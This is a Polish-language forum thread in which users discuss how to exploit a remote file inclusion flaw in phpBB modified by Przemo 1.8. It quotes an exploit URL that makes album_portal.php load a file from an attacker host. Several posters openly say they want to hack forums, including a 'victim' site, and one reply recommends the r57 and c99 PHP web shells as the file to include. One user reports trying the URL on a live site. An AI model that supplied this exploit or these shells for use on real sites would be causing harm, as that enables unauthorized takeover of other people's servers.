phpBB modified by Przemo 1.8

[mlody_pytacz]

Witam,
Wiec tak mam problem (jak zwykle

). Otoz mam forum phpbb mb Przemo 1.8 i cos takiego:
http://www.cc-team.org/index.php?name=bugtraq&show=290

Wszystko fajnie ale:

Exploit:
http://[victim_host]/album_portal.php?phpbb_root_path=http://[evil_host]/&phpEx=/../../[evil_file.php]

evil_file.php musi istniec na evil_host.[/b]

co mam umiescic w tym evil_file.php. Nie jest to podane w opisie, prosze pomozcie.

 

[marcinmx]

jest! po http:// :shock:

 

[GreEnSnake]

Originally posted by mlody_pytacz
Witam,
Wiec tak mam problem (jak zwykle

). Otoz mam forum phpbb mb Przemo 1.8 i cos takiego:
http://www.cc-team.org/index.php?name=bugtraq&show=290

Wszystko fajnie ale:

<div class='quotetop'>CYTAT

Exploit:
http://[victim_host]/album_portal.php?phpbb_root_path=http://[evil_host]/&phpEx=/../../[evil_file.php]

evil_file.php musi istniec na evil_host.

co mam umiescic w tym evil_file.php. Nie jest to podane w opisie, prosze pomozcie.[/b][/quote]
Chodzi o dowolny plik ktory mozna podgladnac np. config.php .
Przynajmniej tak mi sie zdaje =] .

 

[mlody_pytacz]

Originally posted by marcinmx
jest! po http:// :shock:

Niebardzo rozumiem o co Co chodzi :?

Greensnake mozesz troszke jasniej

 

[GreEnSnake]

Juz jasniej sie nie da :? .

 

[podolaczek]

To i ja sie dolacze. Mam przykladowe forum www.ofiara.pl no i chce je zhackowac

Po pierwsze co zrobic z tym evil file i jaki to plik musi byc

 

[pura89]

Originally posted by marcinmx
jest! po http:// :shock:

jeżeli znałbyś się na php to wiedziałbyś, że marcinmx dał ci olbrzymią wskazówkę. Popatrz sobie na adres zobacz jakie zmienne są tam przesyłane i wszystko jasne. na koniec dodam coś jeszcze:

wykonanie arbitrazowego kodu z prawami deamona httpd

 

[Pepi]

r57
lub c99
dla chcacego nic trudnego
to dwa dobre shelle :]

 

[~SD]

Ja jako White Hat!

Od dawna szukam czegos co pozwoli mi na odzyskanie forum mojego kolegi, a wiec zrobiłem tak:

http://adresstrony.ok1.pl/album_portal.php...ot_path=http://[evil_host]/&phpEx=/../../[evil_file.php][/b]

I pokazała mi sie biala strona z napisem:

Hacking attempt[/b]

I co dalej? Jak widzicie w mojej sygnaturce jestem w 99% begginer (ale probuje podwyzszyc swoj poziom), proszę o pomoc...

Pozdrawiam
~SD

 

[abramakabra]

Re: Ja jako White Hat!

Originally posted by ~SD
I pokazała mi sie biala strona z napisem:
<div class='quotetop'>CYTAT

Hacking attempt

[/b][/quote]
Jak widać strona została zabezpieczona przed tym błędem

Jak byś nie zauważył po datach to ten bug jest stary jak świat...